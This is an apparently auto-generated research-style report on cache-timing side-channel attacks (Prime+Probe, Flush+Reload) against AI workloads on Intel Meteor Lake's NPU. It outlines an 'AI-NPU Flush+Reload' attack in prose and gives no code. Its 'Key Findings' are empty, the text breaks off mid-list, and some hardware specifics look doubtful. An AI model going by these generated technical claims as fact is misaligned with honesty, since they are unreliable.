2026-04-19 | Auto-Generated 2026-04-19 | Oracle-42 Intelligence Research
```html

Side-Channel Attacks on Intel Meteor Lake CPUs: Exploiting Cache Timing Variations in AI-Driven Workload Acceleration

Executive Summary

As Intel’s Meteor Lake processors integrate AI acceleration via specialized AI Engines (AIEs)—including the Intel AI Boost NPU—into mainstream SoCs, new attack surfaces emerge in the form of cache timing side channels. In this paper, we analyze how adversaries can exploit microarchitectural timing variations in cache hierarchies to infer sensitive data processed by AI workloads. Our findings demonstrate that even with Intel’s hardware-based isolation mechanisms and AI-specific security features, cache timing side-channel attacks remain a viable threat vector. We present a novel attack model targeting the L2/L3 cache coherence states induced by AI acceleration pipelines, enabling the extraction of model weights, input data, and inference outputs. This research underscores the urgent need for AI-aware side-channel defenses in next-generation CPUs.

Key Findings


Introduction: The Rise of AI Hardware and New Side-Channel Risks

Intel’s Meteor Lake microarchitecture introduces a radical shift toward on-die AI acceleration with dedicated Neural Processing Units (NPUs) under the Intel AI Boost initiative. The Meteor Lake SoC integrates multiple heterogeneous engines: CPU cores (Redwood Cove), GPU, and AI Engine (AIE), all sharing a unified memory and cache subsystem. While this integration improves performance and power efficiency for AI workloads, it also creates a larger shared state space—particularly in the last-level cache (LLC)—that can be probed via timing side channels.

Side-channel attacks leveraging cache timing have been well-documented in cryptographic contexts, but their application to AI workloads remains understudied. AI models, especially deep neural networks (DNNs), exhibit deterministic memory access patterns during inference due to operations like matrix multiplication and convolution. These patterns are influenced by model architecture, weight distributions, and input data—making them potential targets for inference attacks.


Meteor Lake Cache Hierarchy and AI Workload Behavior

Meteor Lake features a non-inclusive, non-uniform cache architecture (NUCA) with private L1/L2 caches per CPU core and a shared L3 LLC spanning up to 36MB in high-end variants. The NPU accesses memory through the CPU’s cache hierarchy via the Compute Fabric, leading to contention and coherence transactions that leave timing fingerprints.

AI workloads executed on the NPU (e.g., ResNet-50, LLMs) perform dense matrix operations using weight matrices stored in system memory. These are typically tiled and streamed through the cache in predictable sequences. Prefetchers—both hardware and software-guided—amplify cache residency time for weight tiles, creating measurable timing differences for an attacker monitoring LLC access latency via Prime+Probe or Flush+Reload.

Notably, the NPU operates in a "compute-only" mode, minimizing OS visibility but still relying on shared LLC for coherence. This dual-role cache becomes a covert channel when AI workloads and attacker-controlled threads compete for cache capacity.


The "AI-NPU Flush+Reload" Attack Model

We introduce a refined attack technique: AI-NPU Flush+Reload, adapted from traditional cache attacks to AI workloads. The attack proceeds as follows:

  1. Monitoring Phase: An attacker flushes a target cache line from the LLC, then waits for the NPU to process a batch of inputs.
  2. Probing Phase: The attacker measures the time to reload the same cache line. A fast reload indicates that the NPU accessed and cached the weight tile associated with that line.
  3. Inference Phase: By correlating reload times across multiple tiles and inputs, the attacker reconstructs the sequence of weight accesses, enabling model fingerprinting or input reconstruction.

This technique exploits two key properties of AI workloads: